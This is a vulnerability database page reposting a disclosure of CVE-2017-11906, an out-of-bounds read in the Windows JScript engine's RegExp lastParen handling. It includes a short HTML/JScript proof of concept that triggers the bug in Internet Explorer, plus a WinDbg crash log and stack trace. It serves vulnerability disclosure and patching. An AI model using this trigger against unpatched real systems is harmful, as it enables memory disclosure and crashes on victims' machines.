Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read
2017.12.19
Credit:
ifratric
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2017-11906
CWE:
CWE-200
CVSS Base Score:
2.6/10
Impact Subscore:
2.9/10
Exploitability Subscore:
4.9/10
Exploit range:
Remote
Attack complexity:
High
Authentication:
No required
Confidentiality impact:
Partial
Integrity impact:
None
Availability impact:
None
Windows: out-of-bounds read in jscript!RegExpFncObj::LastParen CVE-2017-11906 There is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places): PoC for IE (note: page heap might be required to obsorve the crash): ========================================= <!-- saved from url=(0014)about:internet --> <meta http-equiv="X-UA-Compatible" content="IE=8"></meta> <script language="Jscript.Encode"> function go() { var r= new RegExp(Array(100).join('()')); ''.search(r); alert(RegExp.lastParen); } go(); </script> ========================================= Debug log: ========================================= (cec.a14): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. jscript!RegExpFncObj::LastParen+0x43: 000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=???????? 0:014> r rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063 rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0 rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148 <a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>=00000000130f9210 <a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>=0000000000000000 <a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>=000000000463fef0 <a href="https://crrev.com/11" title="" class="" rel="nofollow">r11</a>=000000000463ff38 <a href="https://crrev.com/12" title="" class="" rel="nofollow">r12</a>=0000000000000083 <a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>=0000000000000000 <a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>=00000000130f9210 <a href="https://crrev.com/15" title="" class="" rel="nofollow">r15</a>=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 jscript!RegExpFncObj::LastParen+0x43: 000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=???????? 0:014> k # Child-SP RetAddr Call Site 00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43 01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5 02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873 03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373 04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162 05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3 06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea 07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6 08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162 09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7 0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e 0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a 0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267 0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56 0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1 0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f 10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9 11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283 12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101 13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235 14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90 15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb 16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f 17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70 18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1 19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43 1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41 1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240 1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150 1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad 1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5 1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555 20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3 21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f 22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f 23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd 24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d ========================================= This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: ifratric
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top